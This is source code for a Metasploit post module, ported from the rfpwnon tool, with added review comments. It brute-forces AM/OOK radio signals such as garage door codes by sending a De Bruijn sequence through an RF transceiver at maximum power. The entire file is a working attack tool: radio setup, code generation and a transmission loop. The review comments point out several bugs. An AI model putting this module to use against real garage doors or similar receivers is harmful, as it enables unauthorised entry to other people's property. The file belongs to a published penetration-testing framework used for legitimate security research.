Path: blob/master/modules/post/hardware/rftransceiver/rfpwnon.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module for the HWBridge RF transceiver. It generates a De Bruijn
# sequence over the digit alphabet held in @brutechar, slides a window of
# BINLENGTH digits across that sequence, and hands each window to the
# transceiver, PWM-encoded via convert_ook unless RAW is set.
#
# Scratch state (@a, @sequence) and the PWM symbol tables (@zeropwm,
# @onepwm, @twopwm, @brutechar) live on the instance and are mutated by
# run; the methods below are therefore not independent of call order.
class MetasploitModule < Msf::Post
  include Msf::Post::Hardware::RFTransceiver::RFTransceiver

  # Registers module metadata and datastore options and installs the
  # default (binary) PWM symbol tables. @twopwm is deliberately NOT set
  # here; run assigns it only when TRI is true (see convert_ook for the
  # consequence).
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Brute Force AM/OOK (ie: Garage Doors)',
        'Description' => %q{
          Post Module for HWBridge RFTranscievers. Brute forces AM OOK or raw
          binary signals. This is a port of the rfpwnon tool by Corey Harding.
          (https://github.com/exploitagency/github-rfpwnon/blob/master/rfpwnon.py)
        },
        'License' => MSF_LICENSE,
        'Author' => ['Craig Smith'],
        'Platform' => ['hardware'],
        'SessionTypes' => ['hwbridge']
      )
    )
    register_options([
      OptInt.new('FREQ', [true, 'Frequency to transmit on']),
      OptInt.new('BAUD', [false, 'Baud rate to use', 2000]),
      OptInt.new('BINLENGTH', [false, 'Binary Length of signal to brute force', 8]),
      OptInt.new('REPEAT', [false, 'Number of times to repeat the signal', 5]),
      OptString.new('PPAD', [false, 'Specify your own binary padding before the brute forced binary', nil]),
      OptString.new('TPAD', [false, 'Specify your own binary padding after the brute forced binary', nil]),
      OptBool.new('RAW', [false, 'When set, disables PWM encoding. BINLENGTH must be -1', false]),
      OptBool.new('TRI', [false, 'When set, brute foces a trinary signal.', false]),
      OptBool.new('EXTRAVERBOSE', [false, 'More verbose', false]),
      OptInt.new('INDEX', [false, 'USB Index to use', 0]),
      OptInt.new('DELAY', [false, 'Delay in milliseconds between transmissions', 500])
    ])
    # Binary PWM symbols: one digit of the key becomes four PWM bits.
    @zeropwm = '1110'
    @onepwm = '1000'
    # Digit alphabet the De Bruijn sequence is built over ('01' => k = 2).
    @brutechar = '01'
  end

  # Expands each digit of +key+ into its PWM bit pattern (@zeropwm, @onepwm,
  # @twopwm) and packs the resulting bit string into 8-bit chunks.
  #
  # NOTE(review): any character other than '0', '1' or '2' is emitted as a
  # literal '*' (the default for x), which is not a valid binary digit for
  # the String#to_i(2) below. A '2' while @twopwm is unset (TRI off) makes
  # `pwm_str_key += nil` raise TypeError; user-supplied PPAD/TPAD can reach
  # this path. The final chunk may be shorter than 8 bits and is not
  # left-padded, so its value is taken as written.
  #
  # @param key [String] binary/trinary representation
  # @return [Array] ByteArray
  def convert_ook(key)
    pwm_str_key = ''
    key.each_char do |k|
      x = '*'
      case k
      when '0'
        x = @zeropwm
      when '1'
        x = @onepwm
      when '2'
        x = @twopwm
      end
      pwm_str_key += x
    end
    return pwm_str_key.scan(/.{1,8}/).collect { |x| x.to_i(2).chr }
  end

  # Builds the De Bruijn sequence over digits 0..k-1 with window length n and
  # returns it as a String of digit characters. Despite the name, no byte
  # packing happens here; packing is done later by convert_ook / the RAW path.
  # Resets the @a/@sequence scratch state used by the recursive helper.
  #
  # @param k [Integer] alphabet size (@brutechar.length in run)
  # @param n [Integer] window length (BINLENGTH in run)
  # @return [String] concatenated digits of the sequence
  def debruijn_bytes(k, n)
    @a = [0]
    @sequence = []
    debruijn(1, 1, k, n)
    return @sequence.join
  end

  # Recursive step of the standard db(t, p) De Bruijn construction, operating
  # on the instance scratch arrays @a and @sequence.
  #
  # When the prefix is complete (t > n) and its period p divides n, the first
  # p digits of @a are appended to @sequence. Otherwise position t is first
  # filled with @a[t - p] (keeping period p), then with every larger digit up
  # to k - 1 (each of which starts a new period t).
  #
  # @param t [Integer] current position (1-based) in @a
  # @param p [Integer] period of the current prefix
  # @param k [Integer] alphabet size
  # @param n [Integer] window length
  def debruijn(t, p, k, n)
    if t > n
      if n % p == 0
        1.upto(p) { |j| @sequence << @a[j] }
      end
    else
      @a[t] = @a[t - p]
      debruijn(t + 1, p, k, n)
      (@a[t - p] + 1).upto(k - 1) do |j|
        @a[t] = j
        debruijn(t + 1, t, k, n)
      end
    end
  end

  # Module entry point.
  #
  # Bails out early (without touching radio state) if the session is not an
  # RF transceiver or the USB index cannot be selected. Otherwise configures
  # the radio, generates the sequence, and walks it window by window,
  # transmitting each window REPEAT times. Only the normal exit path reaches
  # set_mode('IDLE').
  def run
    unless is_rf?
      print_error('Not an RF Transceiver')
      return
    end
    unless set_index(datastore['INDEX'])
      print_error("Couldn't set usb index to #{datastore['INDEX']}")
      return
    end
    # Trinary mode: swap in the three-symbol PWM tables and widen the
    # alphabet to '012' (k = 3). This is the only place @twopwm is assigned.
    if datastore['TRI']
      @zeropwm = '10001000'
      @onepwm = '11101110'
      @twopwm = '10001110'
      @brutechar = '012'
    end

    # Radio setup.
    set_modulation('ASK/OOK')
    set_freq(datastore['FREQ'])
    set_sync_mode(0)
    set_baud(datastore['BAUD'])
    max_power

    print_status('Generating de bruijn sequence...')
    seq = debruijn_bytes(@brutechar.length, datastore['BINLENGTH'])
    # Re-append the first BINLENGTH - 1 digits so windows that wrap around
    # the end of the cyclic sequence are also covered by the linear walk.
    tail = seq[0, datastore['BINLENGTH'] - 1]
    brutepacket = seq + tail

    print_status("Brute forcing frequency: #{datastore['FREQ']}")
    print_status("Padding before binary: #{datastore['PPAD']}") if datastore['PPAD']
    print_status("Padding after binary: #{datastore['TPAD']}") if datastore['TPAD']
    print_status("De Bruijin Sequence: #{brutepacket}") if datastore['EXTRAVERBOSE']

    # Window bounds: startn is the first digit of the current slice, endy
    # one past its last digit, addr the advance per outer iteration.
    # Default: 512-digit slices (128 in trinary mode).
    startn = 0
    endy = 512
    # NOTE(review): brutepackettmp is never read; the loop below uses the
    # differently spelled local brutepackettemp.
    brutepackettmp = ''
    addr = 512
    if datastore['TRI']
      endy = 128
      addr = 128
    end
    # With repeats or user padding each code is sent on its own: the slice
    # shrinks to exactly BINLENGTH digits and advances one digit at a time.
    if datastore['REPEAT'] >= 2 || datastore['PPAD'] || datastore['TPAD']
      endy = datastore['BINLENGTH']
      addr = 1
    end
    # Transmit
    while startn < brutepacket.length
      (0..datastore['REPEAT'] - 1).each do |_i|
        brutepackettemp = brutepacket[startn..endy - 1]
        # A trailing slice shorter than one code is skipped; `next` only
        # skips this repeat iteration, the offsets still advance below.
        next if brutepackettemp.length < datastore['BINLENGTH']

        # Pad if asked to
        brutepackettemp = datastore['PPAD'] + brutepackettemp if datastore['PPAD']
        brutepackettemp += datastore['TPAD'] if datastore['TPAD']
        # RAW: pack the digit string directly as bits; otherwise PWM-encode.
        if datastore['RAW']
          key_packed = brutepackettemp.scan(/.{1,8}/).collect { |x| x.to_i(2).chr }
        else
          key_packed = convert_ook(brutepackettemp)
        end
        print_status('Transmitting...')
        set_flen(key_packed.length)
        rfxmit(key_packed.join)
        print_status('Binary before PWM encoding:')
        print_status(brutepackettemp.to_s)
        print_status('Binary after PWM encoding:')
        # Bytes -> hex -> Integer -> binary text; Integer#to_s(2) drops any
        # leading zero bits, so this display is not width-preserving.
        print_status(key_packed.join.unpack('H*')[0].hex.to_s(2).to_s)
        # NOTE(review): Integer division - any DELAY below 1000 sleeps 0 s,
        # including the default of 500, so no pause actually occurs there.
        sleep(datastore['DELAY'] / 1000) if datastore['DELAY'] > 0
      end
      # Same condition as the setup above: per-code mode advances one digit;
      # slice mode advances addr - BINLENGTH so consecutive slices overlap
      # by BINLENGTH digits and no window straddling a boundary is missed.
      if (datastore['REPEAT'] >= 2) || datastore['PPAD'] || datastore['TPAD']
        startn += addr
        endy += addr
      else
        startn = startn + addr - datastore['BINLENGTH']
        endy = endy + addr - datastore['BINLENGTH']
      end
    end
    print_status('Done')
    set_mode('IDLE')
  end
end